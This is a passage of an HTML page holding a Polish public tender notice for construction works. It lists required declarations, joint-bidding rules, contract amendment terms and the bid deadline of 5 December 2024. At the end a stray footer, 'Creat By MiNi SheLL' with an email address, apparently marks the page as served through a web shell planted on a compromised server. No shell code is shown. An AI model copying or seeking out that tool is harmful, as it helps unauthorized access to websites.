zgodnie z SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">O udzielenie zamówienia - zgodnie z art. 112 ustawy Pzp, mogą ubiegać się wykonawcy, którzy spełniają określone przez Zamawiającego warunki w postępowaniu, w zakresie zdolności technicznej lub zawodowej<br/> Wraz z ofertą Wykonawca złoży Załącznik nr 9: Oświadczenie o spełnieniu warunków udziału w postępowaniu.<br/> Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień ich złożenia t.j.:<br/> 1. Wykaz robót budowlanych - Załącznik nr 10 do SWZ (wraz z dowodami potwierdzającymi te fakty tj. referencje, listy polecające, umowy i inne)</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca wraz z Ofertą zobowiązany jest złożyć:<br/> 1) oświadczenie wstępne, przygotowane wg wzoru stanowiącego załącznik nr 9 do SWZ;<br/> 2) Załącznik nr 8 do SWZ Oświadczenie o niepodleganiu wykluczeniu<br/> 3) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia jeśli Wykonawca korzysta z potencjału<br/> innego podmiotu, przygotowane wg wzoru stanowiącego załącznik nr 13 do SWZ;<br/> 4) pełnomocnictwo osób podpisujących ofertę do reprezentowania Wykonawcy lub inny dokument potwierdzający<br/> umocowanie do reprezentowania Wykonawcy jeżeli umocowanie nie wynika wprost z dokumentów rejestrowych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oświadczenie o spełnieniu warunku udziału w postępowaniu składa każdy z Wykonawców. Oświadczenie te ma potwierdzać brak podstaw<br/> wykluczenia oraz spełnianie warunków udziału w postępowaniu. Wykonawca, w przypadku polegania na zdolnościach lub<br/> sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, także oświadczenie podmiotu<br/> udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków<br/> udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/> Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (t. j. w formie<br/> elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także<br/> złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie<br/> elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o<br/> notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez<br/> opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem<br/> zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez<br/> upełnomocnionego.<br/> W pozostałym zakresie obowiązują zapisy SWZ oraz ustaw <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym<br/> w art. 454-455 ustawy Pzp oraz wskazanym w projektowanych postanowieniach umowy, stanowiącym Załącznik nr 6 do<br/> SWZ, które zostaną wprowadzone do treści tej umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/lodr</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-05 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-03</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com